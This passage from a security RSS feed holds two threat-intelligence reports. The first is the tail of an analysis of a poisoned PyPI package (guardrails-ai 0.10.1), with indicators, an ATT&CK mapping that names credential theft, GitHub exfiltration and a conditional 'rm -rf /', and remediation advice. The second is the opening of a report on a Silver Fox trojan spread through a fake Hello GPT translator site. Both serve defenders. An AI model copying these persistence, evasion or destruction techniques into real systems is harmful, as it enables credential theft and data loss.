51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">/tmp/kubectl</span></code><p><span leaf="">（自动下载）</span></p></td></tr><tr><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">主机</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">文件</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">/usr/bin/pgmonitor.py</span></code><p><span leaf=""> 或 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">~/.local/bin/pgmonitor.py</span></code></p></td></tr><tr><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">主机</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">服务</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">pgsql-monitor.service</span></code></td></tr><tr><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">主机</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">文件</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">RunForCover.mp3</span></code></td></tr></tbody></table></p><hr style="border-style: solid;border-width: 2px 0px 0px;border-color: rgba(0, 0, 0, 0.1);transform-origin: 0px 0px;transform: scale(1, 0.5);height: 1px;margin: 2em 0px;background: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.1), rgba(0, 0, 0, 0));"/><h2 data-line="362" style="display: block;width: fit-content;padding: 0.3em 1.2em;margin: 2.5em auto 1.5em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);font-size: calc(19.2px);font-weight: bold;text-align: center;border-radius: 6px;box-shadow: none;"><span leaf="">十、ATT&amp;CK 技术映射</span></h2><p style="max-width: 100%;overflow-x: auto;"><table style="border-collapse: separate;border-spacing: 0px;border-radius: 6px;margin: 1em auto;color: rgb(51, 51, 51);box-shadow: none;border: 1px solid rgb(208, 215, 227);width: 2812.47px;"><thead><tr><th style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">阶段</span></p></th><th style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">技术</span></p></th><th style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">说明</span></p></th></tr></thead><tbody><tr><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">初始访问</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">T1195.002 供应链投毒</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">劫持合法 PyPI 包发布恶意版本</span></p></td></tr><tr><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">执行</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">T1059.006 Python</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">__init__.py</span></code><p><span leaf=""> import-time 执行 + subprocess</span></p></td></tr><tr><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">持久化</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">T1543.002 Systemd Service</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">pgsql-monitor.service</span></code><p><span leaf="">，Restart=always</span></p></td></tr><tr><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">防御规避</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">T1036.005 伪装合法服务</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">伪装为 PostgreSQL Monitor</span></p></td></tr><tr><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">防御规避</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">T1497.001 沙箱检测</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">CPU 核数检查、平台检查、语言检查</span></p></td></tr><tr><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">凭据访问</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">T1552.001 文件中的凭据</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">90 个敏感文件路径 + SSH + .env</span></p></td></tr><tr><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">凭据访问</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">T1552.005 云实例元数据</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">AWS/Azure/GCP IMDS</span></p></td></tr><tr><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">凭据访问</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">T1555 密码管理器</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">1Password / Bitwarden / pass / gopass</span></p></td></tr><tr><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">发现</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">T1613 容器发现</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">Docker socket 枚举 + K8s API</span></p></td></tr><tr><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">数据外传</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">T1567.001 外传至代码仓库</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">用窃取的 GitHub Token 创建公开仓库</span></p></td></tr><tr><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">数据外传</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">T1573.002 非对称加密</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">RSA-4096 + AES-256-GCM 信封加密</span></p></td></tr><tr><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">影响</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">T1485 数据销毁</span></p></td><td style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">条件性 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">rm -rf /</span></code></p></td></tr></tbody></table></p><hr style="border-style: solid;border-width: 2px 0px 0px;border-color: rgba(0, 0, 0, 0.1);transform-origin: 0px 0px;transform: scale(1, 0.5);height: 1px;margin: 2em 0px;background: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.1), rgba(0, 0, 0, 0));"/><h2 data-line="381" style="display: block;width: fit-content;padding: 0.3em 1.2em;margin: 2.5em auto 1.5em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);font-size: calc(19.2px);font-weight: bold;text-align: center;border-radius: 6px;box-shadow: none;"><span leaf="">十一、防御建议</span></h2><h3 data-line="383" style="padding-left: 12px;border-left: 4px solid rgb(0, 82, 217);border-bottom: 1px dashed rgb(0, 82, 217);margin: 2em 8px 0.75em 0px;color: rgb(51, 51, 51);font-size: calc(19.2px);font-weight: bold;line-height: 1.2;"><span leaf="">对开发者和 DevOps 团队</span></h3><ul style="list-style-type: disc;padding-left: 1.5em;margin-left: 0px;color: rgb(51, 51, 51);" class="list-paddingleft-1"><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">立即检查</span></strong><span leaf="">，</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">pip show guardrails-ai | grep Version</span></code><span leaf="">，若为 0.10.1 立即卸载并轮换所有凭据</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">锁定依赖版本</span></strong><span leaf="">，使用 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">pip install --require-hashes</span></code><span leaf=""> 或 lockfile 机制，避免自动拉取新版本</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">检查持久化痕迹</span></strong><span leaf="">，排查 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">/usr/bin/pgmonitor.py</span></code><span leaf="">、</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">~/.local/bin/pgmonitor.py</span></code><span leaf="">、</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">pgsql-monitor.service</span></code><span leaf=""> 是否存在</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">排查 GitHub 仓库</span></strong><span leaf="">，搜索账户下是否存在包含 BABA-YAGA、KOSCHEI 等斯拉夫词汇的异常公开仓库</span></p></li></ul><h3 data-line="390" style="padding-left: 12px;border-left: 4px solid rgb(0, 82, 217);border-bottom: 1px dashed rgb(0, 82, 217);margin: 2em 8px 0.75em 0px;color: rgb(51, 51, 51);font-size: calc(19.2px);font-weight: bold;line-height: 1.2;"><span leaf="">对企业安全团队</span></h3><ul style="list-style-type: disc;padding-left: 1.5em;margin-left: 0px;color: rgb(51, 51, 51);" class="list-paddingleft-1"><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">网络层阻断</span></strong><span leaf="">，封禁 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">git-tanstack[.]com</span></code><span leaf=""> 和 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">83.142.209.194</span></code></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">CI/CD 审计</span></strong><span leaf="">，检查 2026-05-12 00:47 UTC 之后的所有构建日志，排查是否拉取了 guardrails-ai</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">凭据轮换</span></strong><span leaf="">，若确认中招，应按</span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">全量泄露</span></strong><span leaf="">处置——AWS/Azure/GCP 密钥、K8s Secrets、SSH 密钥对、GitHub PAT、Docker credentials、Vault token、密码管理器主密码均需轮换</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">GitHub Dead Drop 监控</span></strong><span leaf="">，监控 GitHub Commit Search 中 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">FIRESCALE</span></code><span leaf=""> 关键字的活动</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">供应链安全加固</span></strong><span leaf="">，部署包完整性校验（如 Sigstore/in-toto）、SBOM 可见性，监控关键依赖的异常版本发布</span></p></li></ul><hr style="border-style: solid;border-width: 2px 0px 0px;border-color: rgba(0, 0, 0, 0.1);transform-origin: 0px 0px;transform: scale(1, 0.5);height: 1px;margin: 2em 0px;background: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.1), rgba(0, 0, 0, 0));"/></div><p style="display: none;"><mp-style-type data-value="10000"></mp-style-type></p>



<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=03b7add6&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzI5ODk3OTM1Ng%3D%3D%26mid%3D2247511898%26idx%3D1%26sn%3D55cf5a7445b1796c68e2649152e4d592">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Tue, 12 May 2026 20:18:00 +0800</pubDate>
    </item>
    <item>
      <title>白签藏锋｜银狐团伙近白利用与非 PE 载荷藏匿分析报告</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzI5ODk3OTM1Ng==&amp;mid=2247511889&amp;idx=1&amp;sn=b471744f642d27bd782f8c4a105435be</link>
      <description>银狐木马变种借仿冒Hello GPT翻译器网站投毒，采用“近白利用”（篡改合法签名程序）与“非PE载荷”技术，通过MFC消息回调劫持执行流，最终注入系统进程实现驻留与远程控制。</description>
      <content:encoded><![CDATA[<p>原创 <span>腾讯安全威胁情报</span> <span>2026-05-07 19:55</span> <span style="display: inline-block;">上海</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=8567e588&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FjHUbrwW0VwXGOkO4R1Ao9Orp01AkRLhiaicZKAKO3f51CT57XNXHEZmEoHiaegKGFdKRgr0zzocAqLibRZrKkTtvZlY6GOjgGBJygtgCEVTn6PQ%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>银狐木马变种借仿冒Hello GPT翻译器网站投毒，采用“近白利用”（篡改合法签名程序）与“非PE载荷”技术，通过MFC消息回调劫持执行流，最终注入系统进程实现驻留与远程控制。</p>
  <div class="wx-theme" style="color: rgb(51, 51, 51);font-family: -apple-system, BlinkMacSystemFont, &#34;Segoe UI&#34;, Roboto, &#34;Helvetica Neue&#34;, Arial, &#34;Noto Sans&#34;, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;, &#34;Segoe UI Symbol&#34;, &#34;Noto Color Emoji&#34;;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;overflow-wrap: break-word;font-size: 16px;line-height: 1.6;padding: 20px 16px;"><h2 data-line="0" style="display: block;width: fit-content;padding: 0.3em 1.2em;margin: 0px auto 1.5em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);font-size: calc(19.2px);font-weight: bold;text-align: center;border-radius: 6px;box-shadow: none;"><span leaf="">一、概述</span></h2><p data-line="2" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">近期捕获到一起借 </span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">Hello GPT 翻译器</span></strong><span leaf="">名义投递的钓鱼样本。攻击者仿造官网 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">cn-hellogpt.com</span></code><span leaf="">，向用户分发伪装成 AI 翻译工具的安装包。用户完成看似正常的安装流程后，恶意模块转入后台，在 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">%APPDATA%\Roaming</span></code><span leaf=""> 目录下释放两组随机命名的恶意文件，并通过计划任务完成持久化。</span></p><p data-line="4" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">这批样本和传统的“白 + 黑 DLL”白利用不太一样。以往攻击者常把恶意逻辑放在外置黑 DLL 中，DLL 本身特征明显，容易被静态扫描或行为检测命中。本次样本把执行入口改进到合法签名程序内部，再把核心代码拆到多组非 PE 自定义文件中，形成一套更隐蔽的 </span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">“近白利用 + 非 PE 载荷藏匿”</span></strong><span leaf=""> 链路：</span></p><ul style="list-style-type: disc;padding-left: 1.5em;margin-left: 0px;color: rgb(51, 51, 51);" class="list-paddingleft-1"><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><span leaf="">对 </span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">杭州顺网科技</span></strong><span leaf="">、</span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">万能输入法</span></strong><span leaf=""> 的合法签名程序做二进制 PATCH，把恶意 ShellCode 缝入内部执行路径；</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><span leaf="">将后续核心恶意代码藏在非 PE 格式的自定义文件（</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">.oi / .vc / .ti / .er / .ce / .ou / .pt</span></code><span leaf="">）中；</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><span leaf="">用虚假控制流、流程平坦化、花指令和字符串运行时解密增加静态分析成本；</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><span leaf="">执行 </span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">AMSI 扫描绕过 + ETW 遥测致盲 + 国内主流安全软件关停</span></strong><span leaf=""> 的安全规避链；</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><span leaf="">注入 </span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">sihost.exe / UserAccountBroker.exe / EDPNotify.exe</span></strong><span leaf=""> 等微软原生签名进程，维持 C2 长期驻留。</span></p></li></ul><p data-line="12" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">综合投递方式、载荷组织和对抗手法判断，该样本属于银狐木马分支变种。相比此前常见样本，这次的变化集中在两个点：合法签名程序被改造成 Loader，核心恶意代码转入非 PE 自定义载荷。</span></p><hr style="border-style: solid;border-width: 2px 0px 0px;border-color: rgba(0, 0, 0, 0.1);transform-origin: 0px 0px;transform: scale(1, 0.5);height: 1px;margin: 2em 0px;background: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.1), rgba(0, 0, 0, 0));"/><h2 data-line="16" style="display: block;width: fit-content;padding: 0.3em 1.2em;margin: 2.5em auto 1.5em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);font-size: calc(19.2px);font-weight: bold;text-align: center;border-radius: 6px;box-shadow: none;"><span leaf="">二、初始入口：伪装 Hello GPT 的钓鱼网站</span></h2><p data-line="18" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">攻击者注册仿冒域名 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">cn-hellogpt[.]com</span></code><span leaf="">、</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">hallogpt[.]com</span></code><span leaf="">，克隆真实 AI 翻译工具的界面风格，并在站内批量生成“使用教程”“实战指南”等 SEO 软文，提高站点在搜索引擎中的可信度和权重。行业人员通过搜索引擎检索相关工具关键词时，可能直接进入攻击者设计好的下载链路。<img class="rich_pages wxw-img" data-ratio="0.33055555555555555" data-type="png" data-w="1080" style="display: block;max-width: 100%;margin: 0.5em auto 1em;border-radius: 4px;box-shadow: rgba(0, 0, 0, 0.12) 0px 2px 12px;height: auto !important;" data-imgfileid="100028176" data-aistatus="1" src="https://wechat2rss.xlab.app/img-proxy/?k=241fff2d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FjHUbrwW0VwVib705WYc5xSekTkicLHECaYZV8KbkdliadMDnHsEpEbMeMdiat7AibzN1IyKMkutPQN4kHBGESbRqqtZiaMP1bjdoS1yz6oXM7TER0%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/>下图为攻击者仿造的 Hello GPT 翻译器首页。页面顶部设置“首页、新手教程、软件功能、下载中心、最新资讯”等栏目，主视觉使用“最新最智能的 Hello GPT 翻译器”作为 Slogan，右侧展示多平台聊天软件集成界面，并放置醒目的“下载软件”按钮诱导用户下载恶意安装包。<img class="rich_pages wxw-img" data-ratio="0.537962962962963" data-type="png" data-w="1080" style="display: block;max-width: 100%;margin: 0.5em auto 1em;border-radius: 4px;box-shadow: rgba(0, 0, 0, 0.12) 0px 2px 12px;height: auto !important;" data-imgfileid="100028178" data-aistatus="1" src="https://wechat2rss.xlab.app/img-proxy/?k=73701e2f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FjHUbrwW0VwV9IqN2ZuiaZsiaBVhrguX4wsmLF0Rc8kg6yooMpFbplUJsW14mwmE8csnGWxXrBWiaFSibiafaEO9ScNeut7UWrHFqQxUXShLLyuRE%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/>站内“新手教程”栏目配套了批量生成的文章，标题覆盖“终极实战、自定义词库使用指南、进阶运营实战、高阶玩法、双向翻译功能完整指南、WhatsApp 群发实操教程”等主题。攻击者用这些长尾关键词软文撑起内容纵深，为后续诱导下载铺垫可信度。<img class="rich_pages wxw-img" data-ratio="0.537962962962963" data-type="png" data-w="1080" style="display: block;max-width: 100%;margin: 0.5em auto 1em;border-radius: 4px;box-shadow: rgba(0, 0, 0, 0.12) 0px 2px 